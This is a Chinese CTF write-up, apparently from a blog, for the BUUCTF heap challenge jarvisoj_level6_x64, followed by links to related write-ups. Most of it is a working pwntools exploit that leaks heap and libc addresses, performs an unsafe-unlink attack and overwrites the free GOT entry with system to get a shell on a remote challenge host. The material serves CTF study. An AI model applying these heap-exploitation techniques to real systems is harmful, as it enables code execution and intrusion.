jarvisoj_level6_x64

只能申请unsorted bin大小下的unlink

IDA看一下,可以发现edit里面有任意堆溢出的情况(realloc造成堆溢出)

然后free里面有UAF漏洞

然后几个注意的点,unlink直接可以模板化

1,泄漏地址 包括libc或者存放heap pointer的地址

2,unlink,伪造谁用谁的指针来unlink

3,修改heap为got指针也可以泄漏libc

exp

  1 #coding:utf-8

  2 '''

  3 author: lemon

  4 time:

  5 libc:

  6 python version:

  7 '''

  8

  9 from pwn import *

 10 from LibcSearcher import *

 11

 12 local = 0

 13

 14 binary = "./freenote_x64"

 15

 16 if local == 1:

 17     p = process(binary)

 18 else:

 19     p = remote("node3.buuoj.cn",29231)

 20

 21 def dbg():

 22     context.log_level = 'debug'

 23

 24 context.terminal = ['tmux','splitw','-h']

 25

 26 def add(size,content):

 27     p.sendlineafter('Your choice:','2')

 28     p.sendlineafter('Length of new note: ',str(size))

 29     p.sendafter('Enter your note:',content)

 30

 31 def free(index):

 32     p.sendlineafter('Your choice: ','4')

 33     p.sendlineafter('Note number: ',str(index))

 34

 35 def show():

 36     p.sendlineafter('Your choice: ','1')

 37

 38 def edit(index,size,content):

 39     p.sendlineafter('Your choice: ','3')

 40     p.sendlineafter('Note number: ',str(index))

 41     p.sendlineafter('Length of note: ',str(size))

 42     p.sendafter('Enter your note: ',content)

 43

 44 add(0x80,0x80 * 'a')    # chunk 0

 45 add(0x80,0x80 * 'a')    # chunk 1

 46 add(0x80,0x80 * 'a')    # chunk 2

 47 add(0x80,0x80 * 'a')    # chunk 3

 48 add(0x80,0x80 * 'a')    # chunk 4

 49

 50 edit(4,len("/bin/sh\x00"),"/bin/sh\x00")

 51

 52 #libc = ELF('/lib/x86_64-linux-gnu/libc-2.23.so')

 53

 54 print "unlink前先泄漏出堆的基地址"

 55

 56 free(3)

 57 free(1)

 58

 59 payload = 0x90 * 'a'

 60 edit(0,len(payload),payload)

 61 show()

 62 p.recvuntil(0x90 * 'a')

 63 #heap = u64(p.recv(6) + '\x00\x00')

 64 heap_0 = u64(p.recvuntil('\x0a',drop = True) + '\x00\x00\x00\x00') - 0x19a0

 65 print "[*] heap:",hex(heap_0)

 66 heap_4 = heap_0 + 0x1a40

 67

 68

 69 print "unlink"

 70

 71 fd = heap_0 - 0x18

 72 bk = heap_0 - 0x10

 73

 74 payload = p64(0) + p64(0x80)

 75 payload += p64(fd) + p64(bk)

 76 payload = payload.ljust(0x80,'\x00')

 77 payload += p64(0x80) + p64(0x90)

 78 edit(0,len(payload),payload)

 79

 80 free(1)

 81

 82 print "leak libc"

 83

 84 elf = ELF('./freenote_x64')

 85 free_got = elf.got['free']

 86 print "[*] free:",hex(free_got)

 87

 88 payload = p64(2) + p64(1) + p64(0x8) + p64(free_got)    #chunk0 size改为0x8

 89 payload += p64(0) * 9 + p64(1) + p64(8) + p64(heap_4)

 90 payload = payload.ljust(0x90,'\x00')

 91 edit(0,len(payload),payload)

 92 show()

 93 free = u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))

 94

 95 # libc_base = free - libc.sym['free']

 96 # system = libc_base + libc.sym['system']

 97

 98 libc = LibcSearcher('free',free)

 99 libc_base = free - libc.dump('free')

100 system = libc_base + libc.dump('system')

101

102 payload = p64(system)

103 edit(0,len(payload),payload)

104

105 #gdb.attach(p)

106 p.interactive()

buuctf-pwn:jarvisoj_level6_x64的更多相关文章

  1. [BUUCTF]PWN——babyheap_0ctf_2017

    [BUUCTF]PWN--babyheap_0ctf_2017 附件 步骤: 例行检查,64位,保护全开 试运行一下程序,看到这个布局菜单,知道了这是一道堆的题目,第一次接触堆的小伙伴可以去看一下这个 ...

  2. (buuctf) - pwn入门部分wp - rip -- pwn1_sctf_2016

    [buuctf]pwn入门 pwn学习之路引入 栈溢出引入 test_your_nc [题目链接] 注意到 Ubuntu 18, Linux系统 . nc 靶场 nc node3.buuoj.cn 2 ...

  3. [BUUCTF]PWN——hitcontraining_uaf

    [BUUCTF]--hitcontraining_uaf 附件 步骤: 例行检查,32位,开启了nx保护 试运行一下程序,非常常见的创建堆块的菜单 32位ida载入分析,shift+f12查看程序里的 ...

  4. BUUCTF PWN部分题目wp

    pwn好难啊 PWN 1,连上就有flag的pwnnc buuoj.cn 6000得到flag 2,RIP覆盖一下用ida分析一下,发现已有了system,只需覆盖RIP为fun()的地址,用peda ...

  5. buuctf --pwn part2

    pwn难啊! 1.[OGeek2019]babyrop 先check一下文件,开启了NX 在ida中没有找到system.'/bin/sh'等相关的字符,或许需要ROP绕过(废话,题目提示了) 查看到 ...

  6. buuctf pwn wp---part1

    pwn难啊 1.test_your_nc 测试你nc,不用说,连上就有. 2.rip ida中已经包含了system函数: 溢出,覆盖rip为fun函数,peda计算偏移为23: from pwn i ...

  7. [BUUCTF]PWN——pwnable_hacknote

    pwnable_hacknote 附件 步骤: 例行检查,32位程序,开启了nx和canary保护 本地试运行看一下大概的情况,熟悉的堆的菜单 32位ida载入 add() gdb看一下堆块的布局更方 ...

  8. [BUUCTF]PWN——ciscn_2019_es_7[详解]

    ciscn_2019_es_7 附件 步骤: 例行检查,64位程序,开启了nx保护 本地试运行一下看看大概的情况 64位ida载入,关键函数很简单,两个系统调用,buf存在溢出 看到系统调用和溢出,想 ...

  9. [BUUCTF]PWN——mrctf2020_easyoverflow

    mrctf2020_easyoverflow 附件 步骤: 例行检查,64位程序,保护全开 本地试运行的时候就直接一个输入,然后就没了,直接用64位ida打开 只要满足18行的条件,就能够获取shel ...

  10. [BUUCTF]PWN——0ctf_2017_babyheap

    0ctf_2017_babyheap 附件 步骤: 例行检查,64位程序,保护全开 本地试运行一下,看看大概的情况,经典的堆题的菜单 main函数 add() edit() delete() show ...

随机推荐

  1. burp suite 之 intruder(入侵者)

    intruder:包括自动提交请求的功能 登录密码 撞库 注入 脱裤 Fuzz Burp intruder包含四个模块: Target:攻击的网站目标的详情信息 Positions :用来设置攻击类型 ...

  2. 程序员的开源月刊:HelloGitHub(第 54 期)

    兴趣是最好的老师,HelloGitHub 就是帮你找到兴趣! 简介 分享 GitHub 上有趣.入门级的开源项目. 这是一个面向编程新手.热爱编程.对开源社区感兴趣 人群的月刊,月刊的内容包括:各种编 ...

  3. SON Web Tokens 工具类 [ JwtUtil ]

    pom.xml <dependency> <groupId>io.jsonwebtoken</groupId> <artifactId>jjwt< ...

  4. pytorch和tensorflow的爱恨情仇之基本数据类型

    自己一直以来都是使用的pytorch,最近打算好好的看下tensorflow,新开一个系列:pytorch和tensorflow的爱恨情仇(相爱相杀...) 无论学习什么框架或者是什么编程语言,最基础 ...

  5. Python单向链表的实现

    链表由一系列不必在内存中相连的结构构成,这些对象按线性顺序排序.每个结构含有表元素和指向后继元素的指针.最后一个单元的指针指向NULL.为了方便链表的删除与插入操作,可以为链表添加一个表头. 删除操作 ...

  6. Python中matplotlib.pyplot.imshow画灰度图的多种方法

    转载:https://www.jianshu.com/p/8f96318a153f matplotlib库的教程和使用方法此处就不累赘了,网上有十分多优秀的教程资源.此处直接上代码: def demo ...

  7. OneWire应用 单总线温度传感器DS18系列

    OneWire DS18S20, DS18B20, DS1822 Temperature DS18B20 The DS18B20 digital thermometer provides 9-bit ...

  8. 头文件.h的作用

    参考链接http://www.cnblogs.com/webcyz/archive/2012/09/16/2688035.html懒得复制过来

  9. MySQL计算月份间隔的函数

    要求忽视具体日期,即 2020-01-31 与 2020-02-01 的月份间隔为:1 -- 格式必须为: '%Y%m' SELECT PERIOD_DIFF("202008" , ...

  10. ORA-00017: session requested to set trace event 请求会话以设置跟踪事件

    ORA-00017: session requested to set trace event   ORA-00017: 请求会话以设置跟踪事件 Cause:       The current se ...